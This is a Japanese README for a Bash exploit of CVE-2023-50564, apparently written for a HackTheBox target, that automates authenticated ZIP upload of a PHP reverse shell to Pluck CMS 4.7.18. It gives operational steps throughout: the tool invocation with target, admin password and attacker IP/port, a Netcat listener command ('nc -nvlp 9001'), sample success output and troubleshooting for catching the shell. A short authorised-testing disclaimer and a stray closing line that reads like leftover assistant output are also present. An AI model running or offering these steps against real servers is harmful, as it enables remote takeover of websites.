
CVE-2023-50564のBashエクスプロイト。悪意のあるZIPアップロードを介してPluck CMS 4.7.18で認証済みリモートコード実行を自動化し、PHPリバースシェルをトリガーします。
このスクリプトは Pluck CMS v4.7.18 のリモートコード実行 (RCE) 脆弱性を悪用します。この脆弱性により、悪意のあるユーザーが悪意のある PHP ファイルをサーバーにアップロードして実行し、ターゲットマシン上でリモートコマンド実行を獲得できます。
スクリプトは以下の全プロセスを自動化します:
注: スクリプトは攻撃者側のマシンでリバースシェルを受信するための Netcat リスナーが必要です。
スクリプトを実行する前に、以下を確認してください:
./CVE-2023-50564 -h <ホスト> -P <パスワード> -i <IP> -p <ポート>
-h <ホスト>: ターゲットホスト (例: greenhorn.htb)-P <パスワード>: Pluck CMS 管理パネルのパスワード (例: abcd123)-i <IP>: リバースシェルを受信する攻撃者の IP アドレス-p <ポート>: Netcat リスナーがリバースシェルを受信するために待機しているポート./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat リスナーのセットアップ: 攻撃者側のマシンで、指定したポートで Netcat リスナーを起動します:
nc -nvlp <ポート>
例:
nc -nvlp 9001
スクリプトの実行: ホスト、パスワード、IP アドレス、ポートを含む必要なパラメータをスクリプトに渡します。
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
スクリプトの実行:
love.php) を含む ZIP ファイルをアップロードします。"RCE is waiting for you, please go take a look." そして、スクリプトは経過時間を記録して終了します。ターゲットへのアクセス: リバースシェルがトリガーされると、Netcat リスナーに接続が表示され、ターゲットマシンへのリモートアクセスが得られます。
image
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat listener detected on port 9001.
Downloading reverse shell PHP exploit...
updating: love.php (deflated 60%)
Exploit zipped as loverce.zip and original PHP file removed.
Extracted Cookie: PHPSESSID=somecookievalue
Login successful!
ZIP file uploaded successfully.
RCE is waiting for you, please go take a look.
Script terminated. Total time taken: 70 seconds.
これらのツールがインストールされていない場合は、以下のコマンドでインストールできます:
sudo apt update
sudo apt install curl netcat
sudo yum install curl nc
このスクリプトは教育目的および許可されたペネトレーションテスト目的のみを意図しています。許可なくこのスクリプトを使用することは違法であり、非倫理的です。システム上の脆弱性を悪用する前に、必ず適切な許可を取得してください。
504 Gateway Time-out: リバースシェルの実行を試みる際にこのエラーが発生する場合がありますが、シェルの実行成功には影響しません。このエラーは通常、ターゲットサーバーが HTTP リクエストへの応答に時間がかかりすぎることが原因ですが、シェルは正常に動作するはずです。
Netcat リスナーの問題: リバースシェルを受信できない場合は、IP アドレスとポートが正しく設定されていること、およびターゲットがあなたのマシンに接続するのを妨げるファイアウォールの制限がないことを確認してください。
ログイン失敗: CMS 管理パネルへのログインが失敗する場合は、入力したパスワードが正しいか、ターゲットマシン上で CMS にアクセス可能かどうかを確認してください。
README にさらなるカスタマイズや明確化が必要な場合はお知らせください。